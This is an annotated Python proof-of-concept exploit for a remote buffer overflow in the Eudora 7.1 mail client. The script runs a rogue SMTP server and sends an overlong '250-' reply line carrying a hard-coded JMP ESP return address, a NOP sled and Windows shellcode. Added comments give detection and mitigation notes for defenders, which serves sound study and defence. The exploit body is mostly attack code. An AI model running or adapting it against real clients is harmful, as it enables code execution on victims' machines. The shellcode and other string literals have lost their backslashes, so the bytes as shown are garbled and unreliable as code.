# Title : Eudora 7.1 SMTP Response Remote Buffer Overflow Exploit
# Published : 2007-05-15
# Author : h07
#!/usr/bin/python
# Eudora 7.1 SMTP Response 0day Remote Buffer Overflow PoC Exploit
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Tested on Eudora 7.1.0.9 / XP SP2 Polish
# Shellcode type: Windows Execute Command (calc.exe)
# Note:
# This vulnerability can be exploited only if the user
# ignores the warning about a "buffer overflow" error.
##
from struct import pack
from time import sleep
from socket import *
# Proof-of-concept for a client-side parsing flaw: this script acts as an SMTP
# server and answers the first command of whichever mail client connects with
# a single crafted "250-" reply line. Per the header, the affected client is
# Eudora 7.1.0.9 and the user has to dismiss a "buffer overflow" warning.
# Written for Python 2 (print statements, str used as a byte string).
#
# NOTE(review): the string literals on this page are not byte-faithful
# (extraction damage), so treat the listing as illustrative and do not derive
# network or file signatures from the text as shown.
#
# Defender notes:
#  - The hostile data travels server -> client, so filtering on the
#    organisation's own inbound mail servers never sees it. Visibility has to
#    come from the endpoint or from monitoring client connections to
#    unexpected SMTP hosts.
#  - Only 76 filler bytes precede the overwritten value, far below the
#    512-octet reply-line limit in the SMTP RFCs, so a length threshold alone
#    will not flag the reply; non-printable bytes inside an SMTP reply line
#    are the more useful signal.
#  - The underlying defect is an unbounded copy of a server reply line in the
#    client. The fix is bounds checking in the client's reply parser;
#    operationally, retire the affected client version.

# Listen on every interface, on the standard SMTP port.
bind_addr = '0.0.0.0'
bind_port = 25
# Payload placed after the overwritten value. The header describes it as a
# Windows "execute command" stub that starts calc.exe, i.e. a demonstration
# payload; the bytes are not verified here.
shellcode = (
"x31xc9x83xe9xdbxd9xeexd9x74x24xf4x5bx81x73x13xd8"
"x22x72xe4x83xebxfcxe2xf4x24xcax34xe4xd8x22xf9xa1"
"xe4xa9x0exe1xa0x23x9dx6fx97x3axf9xbbxf8x23x99x07"
"xf6x6bxf9xd0x53x23x9cxd5x18xbbxdex60x18x56x75x25"
"x12x2fx73x26x33xd6x49xb0xfcx26x07x07x53x7dx56xe5"
"x33x44xf9xe8x93xa9x2dxf8xd9xc9xf9xf8x53x23x99x6d"
"x84x06x76x27xe9xe2x16x6fx98x12xf7x24xa0x2dxf9xa4"
"xd4xa9x02xf8x75xa9x1axecx31x29x72xe4xd8xa9x32xd0"
"xddx5ex72xe4xd8xa9x1axd8x87x13x84x84x8exc9x7fx8c"
"x28xa8x76xbbxb0xbax8cx6exd6x75x8dx03x30xccx8dx1b"
"x27x41x13x88xbbx0cx17x9cxbdx22x72xe4")
# Hard-coded absolute address, tied by the author's note to one DLL on one OS
# build and language. Dependence on a fixed module address is why address
# space layout randomisation, together with non-executable stacks (DEP), is
# the standard platform mitigation for this bug class.
opcode = 0x7CA58265 # JMP ESP (SHELL32.DLL / XP SP2 Polish)
# Reply line layout: "250-" prefix (the form used for a non-final line of a
# multi-line SMTP reply), 76 filler bytes, the address packed as a 32-bit
# little-endian value, 32 repetitions of a padding string, the payload, then
# the line terminator.
buf = "250-"
buf += "A" * 76
buf += pack("<L", opcode)
buf += "x90" * 32
buf += shellcode
buf += "rn"
# Plain TCP listener with a backlog of one; a single connection is served.
s = socket(AF_INET, SOCK_STREAM)
s.bind((bind_addr, bind_port))
s.listen(1)
print "Listening on %s:%d..." % (bind_addr, bind_port)
# Blocks until a mail client connects.
cl, addr = s.accept()
print "Connected accepted from: %s" % (addr[0])
# SMTP 220 greeting, which prompts the client to send its first command.
cl.send('220 Dupa Jasiarn')
# Echo the client's first command (up to 1024 bytes) without its final
# character; presumably this trims the trailing newline.
print cl.recv(1024)[:-1]
# The crafted line is sent as the response to that first command.
cl.send(buf)
# Short pause before closing so the reply is delivered before teardown
# (presumably; the script gives no reason for the delay).
sleep(1)
cl.close()
s.close()
print "Done"
# EoF